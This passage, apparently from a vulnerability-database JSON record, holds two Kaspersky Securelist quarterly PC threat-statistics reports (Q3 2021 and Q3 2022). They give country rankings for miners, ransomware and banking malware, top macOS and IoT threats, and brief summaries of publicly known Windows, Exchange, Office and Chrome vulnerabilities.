With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.\n\n_Number of unique users attacked by miners, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150635/07-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150710/08-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.41 \n2 | Rwanda | 2.26 \n3 | Myanmar | 2.22 \n4 | Uzbekistan | 1.61 \n5 | Ecuador | 1.47 \n6 | Pakistan | 1.43 \n7 | Tanzania | 1.40 \n8 | Mozambique | 1.34 \n9 | Kazakhstan | 1.34 \n10 | Azerbaijan | 1.27 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\n### Quarter highlights\n\nMuch clamor was caused in Q3 by a whole new family of vulnerabilities in Microsoft Windows printing subsystem, one already known to the media as PrintNightmare: [CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>), [CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>), [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>), [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>), [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>). 
All those vulnerabilities allow for local escalation of privileges or remote execution of commands with system rights and, as they require next to nothing for exploitation, they are often used by popular mass infection tools. To fix them, several Microsoft patches are required.\n\nThe vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer \u2014 or even a domain controller \u2014 provided the Active Directory certificate service is present and active.\n\nIn the newest OS Windows 11, even before its official release, the vulnerability [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry hives, including SAM, through the shadow copy mechanism, potentially exposing passwords and other critical data.\n\nIn Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle ([CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>), [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195>), [CVE-2021-31196](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>)). If exploited in combination, these open full control of mail servers managed by Microsoft Exchange Server. 
We already covered [similar vulnerabilities](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) \u2014 for instance, they were used in a HAFNIUM attack, also targeting Microsoft Exchange Server.\n\nAs before, server attacks relying on brute-forcing of passwords to various network services, such as MS SQL, RDP, etc., stand out among Q3 2021 network threats. Attacks using the exploits EternalBlue, EternalRomance and similar are as popular as ever. Among the new ones is the grim vulnerability enabling remote code execution when processing the Object-Graph Navigation Language in the product Atlassian Confluence Server ([CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)) often used in various corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability [CVE-2021-22937](<https://nvd.nist.gov/vuln/detail/CVE-2021-22937>), which however requires the administrator password for it to be exploited.\n\n### Statistics\n\nAs before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60.68%). These are popular due to the large body of users, most of whom still use older versions of the software, thus making the attackers' job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, it was due to the fact that the new vulnerability [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) was discovered in the wild, instantly employed to compromise user machines. The attacker can exploit it by using the standard functionality that allows office documents to download templates, implemented with the help of special ActiveX components. There is no proper validation of the processed data during the operation, so any malicious code can be downloaded. 
As you are reading this, the relevant security update is already available.\n\nThe way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), with another popular vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) not far behind. We already covered these many times \u2014 all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151038/09-en-malware-report-q3-2021-pc-graphs.png>))_\n\nThe share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 \u2014 some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>) (type confusion error corrupting the heap memory), [CVE-2021-30632](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (out-of-bounds write in V8) and [CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. 
It should also be noted that with Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built with its open codebase vulnerable.\n\nThe third place is held by Google Android vulnerabilities (5.36%) \u2014 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), their share gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.\n\nOur ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).\n\n## Attacks on macOS\n\nWe will remember Q3 2021 for the two interesting revelations. The first one is the use of [malware code targeting macOS](<https://securelist.com/wildpressure-targets-macos/103072/>) as part of the WildPressure campaign. The second is the detailed [review of the previously unknown FinSpy implants](<https://securelist.com/finspy-unseen-findings/104322/>) for macOS.\n\nSpeaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. 
Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) \u2014 this potentially unwanted software sends user browser history to its owners' servers.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 13.22 \n2 | Monitor.OSX.HistGrabber.b | 11.19 \n3 | AdWare.OSX.Pirrit.ac | 10.31 \n4 | AdWare.OSX.Pirrit.o | 9.32 \n5 | AdWare.OSX.Bnodlero.at | 7.43 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.22 \n7 | AdWare.OSX.Pirrit.gen | 6.41 \n8 | AdWare.OSX.Cimpli.m | 6.29 \n9 | AdWare.OSX.Bnodlero.bg | 6.13 \n10 | AdWare.OSX.Pirrit.ae | 5.96 \n11 | AdWare.OSX.Agent.gen | 5.65 \n12 | AdWare.OSX.Pirrit.aa | 5.39 \n13 | Trojan-Downloader.OSX.Agent.h | 4.49 \n14 | AdWare.OSX.Bnodlero.ay | 4.18 \n15 | AdWare.OSX.Ketin.gen | 3.56 \n16 | AdWare.OSX.Ketin.h | 3.46 \n17 | Backdoor.OSX.Agent.z | 3.45 \n18 | Trojan-Downloader.OSX.Lador.a | 3.06 \n19 | AdWare.OSX.Bnodlero.t | 2.80 \n20 | AdWare.OSX.Bnodlero.ax | 2.64 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151108/10-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 3.05 \n2 | Spain | 2.85 \n3 | India | 2.70 \n4 | Mexico | 2.59 \n5 | Canada | 2.52 \n6 | Italy | 2.42 \n7 | United States | 2.37 \n8 | Australia | 2.23 \n9 | Brazil | 2.21 \n10 | United Kingdom | 2.12 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). 
\n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q3 2021, France took the lead having the greatest percentage of attacks on users of Kaspersky security solutions (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just less than a quarter of all devices attempted brute-forcing our traps via SSH.\n\nTelnet | 76.55% \n---|--- \nSSH | 23.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021_\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 84.29% \n---|--- \nSSH | 15.71% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 39.48 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.67 \n3 | Backdoor.Linux.Agent.bc | 10.00 \n4 | Backdoor.Linux.Mirai.ba | 8.65 \n5 | Trojan-Downloader.Shell.Agent.p | 3.50 \n6 | Backdoor.Linux.Gafgyt.a | 2.52 \n7 | RiskTool.Linux.BitCoinMiner.b | 1.69 \n8 | Backdoor.Linux.Ssh.a | 1.23 \n9 | Backdoor.Linux.Mirai.ad | 1.20 \n10 | HackTool.Linux.Sshbru.s | 1.12 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q3 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are 
downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n\n_Distribution of web-attack sources by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151328/13-en-malware-report-q3-2021-pc-graphs-1.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Tunisia | 27.15 \n2 | Syria | 17.19 \n3 | Yemen | 17.05 \n4 | Nepal | 15.27 \n5 | Algeria | 15.27 \n6 | Macao | 14.83 \n7 | Belarus | 14.50 \n8 | Moldova | 13.91 \n9 | Madagascar | 13.80 \n10 | Serbia | 13.48 \n11 | Libya | 13.13 \n12 | Mauritania | 13.06 \n13 | Mongolia | 13.06 \n14 | India | 12.89 \n15 | Palestine | 12.79 \n16 | Sri Lanka | 12.76 \n17 | Ukraine | 12.39 \n18 | Estonia | 11.61 \n19 | Tajikistan | 11.44 \n20 | Qatar | 11.14 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151358/14-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2021, our File Anti-Virus detected **62,577,326** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Turkmenistan | 47.42 \n2 | Yemen | 44.27 \n3 | Ethiopia | 42.57 \n4 | Tajikistan | 42.51 \n5 | Uzbekistan | 40.41 \n6 | South Sudan | 40.15 \n7 | Afghanistan | 40.07 \n8 | Cuba | 38.20 \n9 | Bangladesh | 36.49 \n10 | Myanmar | 35.96 \n11 | Venezuela | 35.20 \n12 | China | 35.16 \n13 | Syria | 34.64 \n14 | Madagascar | 33.49 \n15 | Rwanda | 33.06 \n16 | Sudan | 33.01 \n17 | Benin | 32.68 \n18 | Burundi | 31.88 \n19 | Laos | 31.70 \n20 | Cameroon | 31.28 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). 
\n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151433/15-en-malware-report-q3-2021-pc-graphs.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.14% of users' computers at least once during the quarter. Russia scored 14.64% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution in Q3 2021. 
PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-7481", "CVE-2021-1640", "CVE-2021-1675", "CVE-2021-22937", "CVE-2021-26084", "CVE-2021-26878", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34483", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "href": "https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-30T12:08:22", "description": "\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware 
attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. 
The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. 
More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few 
Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. 
A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). 
These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. 
